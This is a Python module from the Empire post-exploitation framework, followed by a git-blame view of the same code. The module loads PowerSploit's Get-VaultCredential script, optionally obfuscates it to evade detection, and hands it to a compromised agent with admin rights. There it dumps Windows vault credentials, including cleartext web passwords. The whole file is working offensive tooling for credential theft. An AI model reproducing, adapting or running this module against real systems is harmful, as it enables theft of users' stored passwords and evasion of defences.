Empire/lib/modules/powershell/credentials/vault_credential.py

from lib.common import helpers

class Module:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'Get-VaultCredential',

            'Author': ['@mattifestation'],

            'Description': ("Runs PowerSploit's Get-VaultCredential to display "
                            "Windows vault credential objects including "
                            "cleartext web credentials."),

            'Background' : True,

            'OutputExtension' : None,
            
            'NeedsAdmin' : True,

            'OpsecSafe' : True,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',
            
            'Comments': [
                'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        
        # read in the common module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Get-VaultCredential.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            f = open(moduleSource, 'r')
        except:
            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
            return ""

        moduleCode = f.read()
        f.close()

        script = moduleCode

        
        scriptEnd = "Get-VaultCredential"
        if obfuscate:
            scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        return script
Initial BSidesLV '15 release of v1.0.0 2015-08-05 18:36:39 +00:00			`from lib.common import helpers`

			`class Module:`

			`def __init__(self, mainMenu, params=[]):`

			`self.info = {`
			`'Name': 'Get-VaultCredential',`

			`'Author': ['@mattifestation'],`

			`'Description': ("Runs PowerSploit's Get-VaultCredential to display "`
			`"Windows vault credential objects including "`
			`"cleartext web credentials."),`

			`'Background' : True,`

			`'OutputExtension' : None,`

			`'NeedsAdmin' : True,`

			`'OpsecSafe' : True,`

2.0.0 beta, DerbyCon release 2016-09-23 18:04:35 +00:00			`'Language' : 'powershell',`

			`'MinLanguageVersion' : '2',`
Initial BSidesLV '15 release of v1.0.0 2015-08-05 18:36:39 +00:00
			`'Comments': [`
			`'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1'`
			`]`
			`}`

			`# any options needed by the module, settable during runtime`
			`self.options = {`
			`# format:`
			`# value_name : {description, required, default_value}`
			`'Agent' : {`
			`'Description' : 'Agent to run module on.',`
			`'Required' : True,`
			`'Value' : ''`
			`}`
			`}`

			`# save off a copy of the mainMenu object to access external functionality`
			`# like listeners/agent handlers/etc.`
			`self.mainMenu = mainMenu`

			`for param in params:`
			`# parameter format is [Name, Value]`
			`option, value = param`
			`if option in self.options:`
			`self.options[option]['Value'] = value`


Implement Obfuscation 2017-03-11 23:35:17 +00:00			`def generate(self, obfuscate=False, obfuscationCommand=""):`
Initial BSidesLV '15 release of v1.0.0 2015-08-05 18:36:39 +00:00
			`# read in the common module source code`
			`moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Get-VaultCredential.ps1"`
Implement Obfuscation 2017-03-11 23:35:17 +00:00			`if obfuscate:`
			`helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)`
			`moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")`
Initial BSidesLV '15 release of v1.0.0 2015-08-05 18:36:39 +00:00			`try:`
			`f = open(moduleSource, 'r')`
			`except:`
			`print helpers.color("[!] Could not read module source path at: " + str(moduleSource))`
			`return ""`

			`moduleCode = f.read()`
			`f.close()`

			`script = moduleCode`


Implement Obfuscation 2017-03-11 23:35:17 +00:00			`scriptEnd = "Get-VaultCredential"`
			`if obfuscate:`
Improved preobfuscate command, better support for invoke-obfuscation style obfuscate commands, added warning message when trying to obfuscate without PowerShell installed 2017-04-23 01:17:28 +00:00			`scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)`
Implement Obfuscation 2017-03-11 23:35:17 +00:00			`script += scriptEnd`
Initial BSidesLV '15 release of v1.0.0 2015-08-05 18:36:39 +00:00			`return script`